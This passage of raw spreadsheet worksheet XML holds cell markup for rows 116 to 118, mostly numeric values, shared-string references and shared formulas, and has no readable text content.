      <c r="HG116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH116" s="116">
        <v>16060.0</v>
      </c>
      <c r="HI116" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ116" s="93" t="s">
        <v>1982</v>
      </c>
      <c r="HK116" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL116" s="93">
        <v>1.0</v>
      </c>
      <c r="HM116" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN116" s="93">
        <v>0.0</v>
      </c>
      <c r="HO116" s="93">
        <v>1.0</v>
      </c>
      <c r="HP116" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ116" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR116" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS116" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT116" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU116" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV116" s="119">
        <v>31914.0</v>
      </c>
      <c r="HW116" s="119">
        <v>1.0</v>
      </c>
      <c r="HX116" s="119">
        <v>1.0</v>
      </c>
      <c r="HY116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC116" s="120">
        <f t="shared" si="202"/>
        <v>31914</v>
      </c>
      <c r="ID116" s="120">
        <v>31914.0</v>
      </c>
      <c r="IE116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH116" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II116" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ116" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK116" s="99">
        <v>1.0</v>
      </c>
      <c r="IL116" s="99">
        <v>1.0</v>
      </c>
      <c r="IM116" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN116" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO116" s="98">
        <v>1.0</v>
      </c>
      <c r="IP116" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ116" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR116" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS116" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT116" s="127"/>
      <c r="IU116" s="127"/>
      <c r="IV116" s="127"/>
      <c r="IW116" s="127"/>
      <c r="IX116" s="127"/>
      <c r="IY116" s="127"/>
      <c r="IZ116" s="127"/>
      <c r="JA116" s="127"/>
      <c r="JB116" s="127"/>
      <c r="JC116" s="127"/>
      <c r="JD116" s="127"/>
      <c r="JE116" s="127"/>
      <c r="JF116" s="127"/>
      <c r="JG116" s="127"/>
      <c r="JH116" s="127"/>
      <c r="JI116" s="127"/>
      <c r="JJ116" s="127"/>
      <c r="JK116" s="127"/>
      <c r="JL116" s="127"/>
      <c r="JM116" s="127"/>
      <c r="JN116" s="127"/>
      <c r="JO116" s="127"/>
      <c r="JP116" s="127"/>
      <c r="JQ116" s="127"/>
      <c r="JR116" s="127"/>
      <c r="JS116" s="127"/>
      <c r="JT116" s="127"/>
      <c r="JU116" s="127"/>
      <c r="JV116" s="127"/>
      <c r="JW116" s="127"/>
      <c r="JX116" s="127"/>
      <c r="JY116" s="127"/>
      <c r="JZ116" s="127"/>
      <c r="KA116" s="127"/>
      <c r="KB116" s="127"/>
      <c r="KC116" s="127"/>
      <c r="KD116" s="127"/>
      <c r="KE116" s="127"/>
      <c r="KF116" s="127"/>
      <c r="KG116" s="127"/>
      <c r="KH116" s="127"/>
      <c r="KI116" s="127"/>
      <c r="KJ116" s="127"/>
      <c r="KK116" s="127"/>
      <c r="KL116" s="127"/>
      <c r="KM116" s="127"/>
      <c r="KN116" s="127"/>
      <c r="KO116" s="127"/>
      <c r="KP116" s="127"/>
      <c r="KQ116" s="127"/>
      <c r="KR116" s="127"/>
      <c r="KS116" s="127"/>
      <c r="KT116" s="127"/>
      <c r="KU116" s="127"/>
      <c r="KV116" s="127"/>
      <c r="KW116" s="127"/>
      <c r="KX116" s="127"/>
      <c r="KY116" s="127"/>
      <c r="KZ116" s="127"/>
      <c r="LA116" s="127"/>
      <c r="LB116" s="127"/>
      <c r="LC116" s="127"/>
      <c r="LD116" s="127"/>
      <c r="LE116" s="127"/>
      <c r="LF116" s="127"/>
      <c r="LG116" s="127"/>
      <c r="LH116" s="127"/>
      <c r="LI116" s="127"/>
      <c r="LJ116" s="127"/>
      <c r="LK116" s="127"/>
      <c r="LL116" s="127"/>
      <c r="LM116" s="127"/>
      <c r="LN116" s="127"/>
      <c r="LO116" s="127"/>
      <c r="LP116" s="127"/>
      <c r="LQ116" s="127"/>
      <c r="LR116" s="127"/>
      <c r="LS116" s="127"/>
      <c r="LT116" s="127"/>
      <c r="LU116" s="127"/>
      <c r="LV116" s="127"/>
      <c r="LW116" s="127"/>
      <c r="LX116" s="127"/>
      <c r="LY116" s="127"/>
      <c r="LZ116" s="127"/>
      <c r="MA116" s="127"/>
      <c r="MB116" s="127"/>
      <c r="MC116" s="127"/>
      <c r="MD116" s="127"/>
      <c r="ME116" s="127"/>
      <c r="MF116" s="127"/>
      <c r="MG116" s="127"/>
      <c r="MH116" s="127"/>
      <c r="MI116" s="127"/>
      <c r="MJ116" s="127"/>
      <c r="MK116" s="127"/>
      <c r="ML116" s="127"/>
      <c r="MM116" s="127"/>
      <c r="MN116" s="127"/>
      <c r="MO116" s="127"/>
      <c r="MP116" s="127"/>
      <c r="MQ116" s="127"/>
      <c r="MR116" s="127"/>
      <c r="MS116" s="127"/>
      <c r="MT116" s="127"/>
      <c r="MU116" s="127"/>
      <c r="MV116" s="127"/>
      <c r="MW116" s="127"/>
      <c r="MX116" s="127"/>
      <c r="MY116" s="127"/>
      <c r="MZ116" s="127"/>
      <c r="NA116" s="127"/>
      <c r="NB116" s="127"/>
      <c r="NC116" s="127"/>
      <c r="ND116" s="127"/>
      <c r="NE116" s="127"/>
      <c r="NF116" s="127"/>
      <c r="NG116" s="127"/>
      <c r="NH116" s="127"/>
      <c r="NI116" s="127"/>
      <c r="NJ116" s="127"/>
      <c r="NK116" s="127"/>
      <c r="NL116" s="127"/>
      <c r="NM116" s="127"/>
      <c r="NN116" s="127"/>
      <c r="NO116" s="127"/>
      <c r="NP116" s="127"/>
      <c r="NQ116" s="127"/>
      <c r="NR116" s="127"/>
      <c r="NS116" s="127"/>
      <c r="NT116" s="127"/>
      <c r="NU116" s="127"/>
      <c r="NV116" s="127"/>
      <c r="NW116" s="127"/>
      <c r="NX116" s="127"/>
      <c r="NY116" s="127"/>
    </row>
    <row r="117" ht="153.75" customHeight="1">
      <c r="B117" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C117" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D117" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E117" s="90" t="s">
        <v>1983</v>
      </c>
      <c r="F117" s="90" t="s">
        <v>1984</v>
      </c>
      <c r="G117" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H117" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I117" s="92" t="s">
        <v>1985</v>
      </c>
      <c r="J117" s="92" t="s">
        <v>1986</v>
      </c>
      <c r="K117" s="92" t="s">
        <v>1987</v>
      </c>
      <c r="L117" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M117" s="93">
        <v>3.0</v>
      </c>
      <c r="N117" s="93">
        <v>1.0</v>
      </c>
      <c r="O117" s="93">
        <v>1.0</v>
      </c>
      <c r="P117" s="93">
        <v>1.0</v>
      </c>
      <c r="Q117" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R117" s="93">
        <v>1.0</v>
      </c>
      <c r="S117" s="93">
        <v>0.0</v>
      </c>
      <c r="T117" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U117" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V117" s="167" t="s">
        <v>1988</v>
      </c>
      <c r="W117" s="96" t="s">
        <v>1989</v>
      </c>
      <c r="X117" s="126" t="s">
        <v>1990</v>
      </c>
      <c r="Y117" s="126" t="s">
        <v>1991</v>
      </c>
      <c r="Z117" s="132" t="s">
        <v>1992</v>
      </c>
      <c r="AA117" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB117" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC117" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD117" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE117" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF117" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG117" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH117" s="99" t="s">
        <v>1993</v>
      </c>
      <c r="AI117" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ117" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL117" s="100">
        <v>0.0</v>
      </c>
      <c r="AM117" s="100">
        <v>0.0</v>
      </c>
      <c r="AN117" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP117" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ117" s="100">
        <v>0.0</v>
      </c>
      <c r="AR117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT117" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX117" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY117" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ117" s="100">
        <v>0.0</v>
      </c>
      <c r="BA117" s="102">
        <v>3.0</v>
      </c>
      <c r="BB117" s="102">
        <v>0.0</v>
      </c>
      <c r="BC117" s="102">
        <v>0.0</v>
      </c>
      <c r="BD117" s="102">
        <v>0.0</v>
      </c>
      <c r="BE117" s="102">
        <v>0.0</v>
      </c>
      <c r="BF117" s="102">
        <v>0.0</v>
      </c>
      <c r="BG117" s="102">
        <v>0.0</v>
      </c>
      <c r="BH117" s="102">
        <v>0.0</v>
      </c>
      <c r="BI117" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ117" s="102">
        <v>0.0</v>
      </c>
      <c r="BK117" s="102">
        <v>0.0</v>
      </c>
      <c r="BL117" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM117" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN117" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO117" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP117" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ117" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR117" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS117" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT117" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU117" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV117" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW117" s="104">
        <v>2000418.0</v>
      </c>
      <c r="BX117" s="104">
        <v>1.0</v>
      </c>
      <c r="BY117" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ117" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA117" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CB117" s="104">
        <v>1.0</v>
      </c>
      <c r="CC117" s="104">
        <v>1.0</v>
      </c>
      <c r="CD117" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CE117" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF117" s="104">
        <f t="shared" si="203"/>
        <v>2000418</v>
      </c>
      <c r="CG117" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CH117" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI117" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ117" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK117" s="104">
        <v>0.0</v>
      </c>
      <c r="CL117" s="104">
        <v>0.0</v>
      </c>
      <c r="CM117" s="105">
        <v>3.0</v>
      </c>
      <c r="CN117" s="105">
        <v>1.0</v>
      </c>
      <c r="CO117" s="105">
        <v>1.0</v>
      </c>
      <c r="CP117" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ117" s="105">
        <v>1.0</v>
      </c>
      <c r="CR117" s="105">
        <v>1.0</v>
      </c>
      <c r="CS117" s="105">
        <v>0.0</v>
      </c>
      <c r="CT117" s="105">
        <v>0.0</v>
      </c>
      <c r="CU117" s="105">
        <v>0.0</v>
      </c>
      <c r="CV117" s="105">
        <v>0.0</v>
      </c>
      <c r="CW117" s="105">
        <v>1.0</v>
      </c>
      <c r="CX117" s="105">
        <v>1.0</v>
      </c>
      <c r="CY117" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ117" s="105">
        <v>1.0</v>
      </c>
      <c r="DA117" s="105">
        <v>1.0</v>
      </c>
      <c r="DB117" s="106">
        <f t="shared" si="176"/>
        <v>1</v>
      </c>
      <c r="DC117" s="106">
        <f t="shared" si="177"/>
        <v>1</v>
      </c>
      <c r="DD117" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE117" s="106">
        <f t="shared" si="179"/>
        <v>1</v>
      </c>
      <c r="DF117" s="106">
        <f t="shared" si="180"/>
        <v>1</v>
      </c>
      <c r="DG117" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH117" s="106">
        <f t="shared" si="181"/>
        <v>1</v>
      </c>
      <c r="DI117" s="106">
        <f t="shared" si="182"/>
        <v>1</v>
      </c>
      <c r="DJ117" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK117" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL117" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM117" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DN117" s="108">
        <v>1.0</v>
      </c>
      <c r="DO117" s="108">
        <v>1.0</v>
      </c>
      <c r="DP117" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ117" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DR117" s="108">
        <v>1.0</v>
      </c>
      <c r="DS117" s="108">
        <v>1.0</v>
      </c>
      <c r="DT117" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DU117" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV117" s="108">
        <f t="shared" si="166"/>
        <v>2000418</v>
      </c>
      <c r="DW117" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DX117" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY117" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ117" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA117" s="108">
        <v>0.0</v>
      </c>
      <c r="EB117" s="108">
        <v>0.0</v>
      </c>
      <c r="EC117" s="109">
        <v>3.0</v>
      </c>
      <c r="ED117" s="109">
        <v>1.0</v>
      </c>
      <c r="EE117" s="109">
        <v>1.0</v>
      </c>
      <c r="EF117" s="109">
        <v>0.0</v>
      </c>
      <c r="EG117" s="109">
        <v>1.0</v>
      </c>
      <c r="EH117" s="109">
        <v>1.0</v>
      </c>
      <c r="EI117" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ117" s="109">
        <v>0.0</v>
      </c>
      <c r="EK117" s="109">
        <v>0.0</v>
      </c>
      <c r="EL117" s="109">
        <v>0.0</v>
      </c>
      <c r="EM117" s="109">
        <v>1.0</v>
      </c>
      <c r="EN117" s="109">
        <v>1.0</v>
      </c>
      <c r="EO117" s="109">
        <v>0.0</v>
      </c>
      <c r="EP117" s="109">
        <v>1.0</v>
      </c>
      <c r="EQ117" s="109">
        <v>1.0</v>
      </c>
      <c r="ER117" s="110">
        <f t="shared" si="184"/>
        <v>1</v>
      </c>
      <c r="ES117" s="110">
        <f t="shared" si="185"/>
        <v>1</v>
      </c>
      <c r="ET117" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU117" s="110">
        <f t="shared" si="187"/>
        <v>1</v>
      </c>
      <c r="EV117" s="110">
        <f t="shared" si="188"/>
        <v>1</v>
      </c>
      <c r="EW117" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX117" s="110">
        <f t="shared" si="190"/>
        <v>1</v>
      </c>
      <c r="EY117" s="110">
        <f t="shared" si="191"/>
        <v>1</v>
      </c>
      <c r="EZ117" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA117" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB117" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC117" s="111" t="s">
        <v>1994</v>
      </c>
      <c r="FD117" s="111">
        <v>4.0</v>
      </c>
      <c r="FE117" s="111">
        <v>8.0</v>
      </c>
      <c r="FF117" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG117" s="111" t="s">
        <v>1995</v>
      </c>
      <c r="FH117" s="111">
        <v>2.0</v>
      </c>
      <c r="FI117" s="111">
        <v>4.0</v>
      </c>
      <c r="FJ117" s="111" t="s">
        <v>1994</v>
      </c>
      <c r="FK117" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL117" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749, 2000418, 2011803</v>
      </c>
      <c r="FM117" s="111" t="s">
        <v>1995</v>
      </c>
      <c r="FN117" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO117" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP117" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ117" s="111">
        <v>0.0</v>
      </c>
      <c r="FR117" s="111">
        <v>0.0</v>
      </c>
      <c r="FS117" s="112">
        <v>3.0</v>
      </c>
      <c r="FT117" s="112">
        <v>2.0</v>
      </c>
      <c r="FU117" s="112">
        <v>6.0</v>
      </c>
      <c r="FV117" s="112">
        <v>0.0</v>
      </c>
      <c r="FW117" s="112">
        <v>8.0</v>
      </c>
      <c r="FX117" s="112">
        <v>8.0</v>
      </c>
      <c r="FY117" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ117" s="112">
        <v>0.0</v>
      </c>
      <c r="GA117" s="112">
        <v>0.0</v>
      </c>
      <c r="GB117" s="112">
        <v>0.0</v>
      </c>
      <c r="GC117" s="112">
        <v>1.0</v>
      </c>
      <c r="GD117" s="112">
        <v>4.0</v>
      </c>
      <c r="GE117" s="112">
        <v>0.0</v>
      </c>
      <c r="GF117" s="112">
        <v>4.0</v>
      </c>
      <c r="GG117" s="112">
        <v>4.0</v>
      </c>
      <c r="GH117" s="113">
        <f t="shared" si="193"/>
        <v>2</v>
      </c>
      <c r="GI117" s="113">
        <f t="shared" si="194"/>
        <v>1</v>
      </c>
      <c r="GJ117" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK117" s="113">
        <f t="shared" si="196"/>
        <v>6</v>
      </c>
      <c r="GL117" s="113">
        <f t="shared" si="197"/>
        <v>4</v>
      </c>
      <c r="GM117" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN117" s="113">
        <f t="shared" si="199"/>
        <v>8</v>
      </c>
      <c r="GO117" s="113">
        <f t="shared" si="200"/>
        <v>4</v>
      </c>
      <c r="GP117" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ117" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR117" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS117" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT117" s="94"/>
      <c r="GU117" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV117" s="116">
        <v>1.0</v>
      </c>
      <c r="GW117" s="116">
        <v>2.0</v>
      </c>
      <c r="GX117" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY117" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ117" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA117" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB117" s="131" t="s">
        <v>12</v>
      </c>
      <c r="HC117" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD117" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE117" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF117" s="131" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG117" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH117" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI117" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ117" s="93" t="s">
        <v>1996</v>
      </c>
      <c r="HK117" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL117" s="93">
        <v>3.0</v>
      </c>
      <c r="HM117" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN117" s="93">
        <v>0.0</v>
      </c>
      <c r="HO117" s="93">
        <v>0.0</v>
      </c>
      <c r="HP117" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ117" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR117" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS117" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT117" s="139" t="s">
        <v>1997</v>
      </c>
      <c r="HU117" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV117" s="119">
        <v>31914.0</v>
      </c>
      <c r="HW117" s="119">
        <v>1.0</v>
      </c>
      <c r="HX117" s="119">
        <v>1.0</v>
      </c>
      <c r="HY117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC117" s="120">
        <f t="shared" si="202"/>
        <v>31914</v>
      </c>
      <c r="ID117" s="120">
        <v>31914.0</v>
      </c>
      <c r="IE117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH117" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II117" s="99" t="s">
        <v>1998</v>
      </c>
      <c r="IJ117" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK117" s="99">
        <v>3.0</v>
      </c>
      <c r="IL117" s="99">
        <v>1.0</v>
      </c>
      <c r="IM117" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN117" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO117" s="98">
        <v>1.0</v>
      </c>
      <c r="IP117" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ117" s="118">
        <f t="shared" si="59"/>
        <v>0.5</v>
      </c>
      <c r="IR117" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS117" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT117" s="127"/>
      <c r="IU117" s="127"/>
      <c r="IV117" s="127"/>
      <c r="IW117" s="127"/>
      <c r="IX117" s="127"/>
      <c r="IY117" s="127"/>
      <c r="IZ117" s="127"/>
      <c r="JA117" s="127"/>
      <c r="JB117" s="127"/>
      <c r="JC117" s="127"/>
      <c r="JD117" s="127"/>
      <c r="JE117" s="127"/>
      <c r="JF117" s="127"/>
      <c r="JG117" s="127"/>
      <c r="JH117" s="127"/>
      <c r="JI117" s="127"/>
      <c r="JJ117" s="127"/>
      <c r="JK117" s="127"/>
      <c r="JL117" s="127"/>
      <c r="JM117" s="127"/>
      <c r="JN117" s="127"/>
      <c r="JO117" s="127"/>
      <c r="JP117" s="127"/>
      <c r="JQ117" s="127"/>
      <c r="JR117" s="127"/>
      <c r="JS117" s="127"/>
      <c r="JT117" s="127"/>
      <c r="JU117" s="127"/>
      <c r="JV117" s="127"/>
      <c r="JW117" s="127"/>
      <c r="JX117" s="127"/>
      <c r="JY117" s="127"/>
      <c r="JZ117" s="127"/>
      <c r="KA117" s="127"/>
      <c r="KB117" s="127"/>
      <c r="KC117" s="127"/>
      <c r="KD117" s="127"/>
      <c r="KE117" s="127"/>
      <c r="KF117" s="127"/>
      <c r="KG117" s="127"/>
      <c r="KH117" s="127"/>
      <c r="KI117" s="127"/>
      <c r="KJ117" s="127"/>
      <c r="KK117" s="127"/>
      <c r="KL117" s="127"/>
      <c r="KM117" s="127"/>
      <c r="KN117" s="127"/>
      <c r="KO117" s="127"/>
      <c r="KP117" s="127"/>
      <c r="KQ117" s="127"/>
      <c r="KR117" s="127"/>
      <c r="KS117" s="127"/>
      <c r="KT117" s="127"/>
      <c r="KU117" s="127"/>
      <c r="KV117" s="127"/>
      <c r="KW117" s="127"/>
      <c r="KX117" s="127"/>
      <c r="KY117" s="127"/>
      <c r="KZ117" s="127"/>
      <c r="LA117" s="127"/>
      <c r="LB117" s="127"/>
      <c r="LC117" s="127"/>
      <c r="LD117" s="127"/>
      <c r="LE117" s="127"/>
      <c r="LF117" s="127"/>
      <c r="LG117" s="127"/>
      <c r="LH117" s="127"/>
      <c r="LI117" s="127"/>
      <c r="LJ117" s="127"/>
      <c r="LK117" s="127"/>
      <c r="LL117" s="127"/>
      <c r="LM117" s="127"/>
      <c r="LN117" s="127"/>
      <c r="LO117" s="127"/>
      <c r="LP117" s="127"/>
      <c r="LQ117" s="127"/>
      <c r="LR117" s="127"/>
      <c r="LS117" s="127"/>
      <c r="LT117" s="127"/>
      <c r="LU117" s="127"/>
      <c r="LV117" s="127"/>
      <c r="LW117" s="127"/>
      <c r="LX117" s="127"/>
      <c r="LY117" s="127"/>
      <c r="LZ117" s="127"/>
      <c r="MA117" s="127"/>
      <c r="MB117" s="127"/>
      <c r="MC117" s="127"/>
      <c r="MD117" s="127"/>
      <c r="ME117" s="127"/>
      <c r="MF117" s="127"/>
      <c r="MG117" s="127"/>
      <c r="MH117" s="127"/>
      <c r="MI117" s="127"/>
      <c r="MJ117" s="127"/>
      <c r="MK117" s="127"/>
      <c r="ML117" s="127"/>
      <c r="MM117" s="127"/>
      <c r="MN117" s="127"/>
      <c r="MO117" s="127"/>
      <c r="MP117" s="127"/>
      <c r="MQ117" s="127"/>
      <c r="MR117" s="127"/>
      <c r="MS117" s="127"/>
      <c r="MT117" s="127"/>
      <c r="MU117" s="127"/>
      <c r="MV117" s="127"/>
      <c r="MW117" s="127"/>
      <c r="MX117" s="127"/>
      <c r="MY117" s="127"/>
      <c r="MZ117" s="127"/>
      <c r="NA117" s="127"/>
      <c r="NB117" s="127"/>
      <c r="NC117" s="127"/>
      <c r="ND117" s="127"/>
      <c r="NE117" s="127"/>
      <c r="NF117" s="127"/>
      <c r="NG117" s="127"/>
      <c r="NH117" s="127"/>
      <c r="NI117" s="127"/>
      <c r="NJ117" s="127"/>
      <c r="NK117" s="127"/>
      <c r="NL117" s="127"/>
      <c r="NM117" s="127"/>
      <c r="NN117" s="127"/>
      <c r="NO117" s="127"/>
      <c r="NP117" s="127"/>
      <c r="NQ117" s="127"/>
      <c r="NR117" s="127"/>
      <c r="NS117" s="127"/>
      <c r="NT117" s="127"/>
      <c r="NU117" s="127"/>
      <c r="NV117" s="127"/>
      <c r="NW117" s="127"/>
      <c r="NX117" s="127"/>
      <c r="NY117" s="127"/>
    </row>
    <row r="118" ht="153.75" customHeight="1">
      <c r="B118" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C118" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D118" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E118" s="90" t="s">
        <v>1999</v>
      </c>
      <c r="F118" s="90" t="s">
        <v>2000</v>
      </c>
      <c r="G118" s="90" t="s">
        <v>2001</v>
      </c>
      <c r="H118" s="90" t="s">
        <v>2002</v>
      </c>
      <c r="I118" s="92" t="s">
        <v>2003</v>
      </c>
      <c r="J118" s="92" t="s">
        <v>2004</v>
      </c>
      <c r="K118" s="92" t="s">
        <v>2005</v>
      </c>
      <c r="L118" s="93" t="s">
        <v>2006</v>
      </c>
      <c r="M118" s="93">
        <v>2.0</v>
      </c>
      <c r="N118" s="93">
        <v>1.0</v>
      </c>
      <c r="O118" s="93">
        <v>0.0</v>
      </c>
      <c r="P118" s="93">
        <v>1.0</v>
      </c>
      <c r="Q118" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R118" s="93">
        <v>1.0</v>
      </c>
      <c r="S118" s="93">
        <v>0.0</v>
      </c>
      <c r="T118" s="94" t="s">
        <v>12</v>
      </c>
